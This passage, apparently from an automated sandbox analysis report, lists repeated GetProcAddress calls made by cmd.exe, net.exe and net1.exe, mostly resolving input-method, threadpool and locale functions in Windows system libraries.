00000000-00005192)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00005192)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00005192)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00005192)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005192)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00000768)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003456)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002188)\n \"net.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002188)\n \"net1.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001956)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00001956)\n \"net1.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001956)\n \"net1.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000516)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00000516)\n \"net1.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000516)\n \"net1.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter LpkEditControl 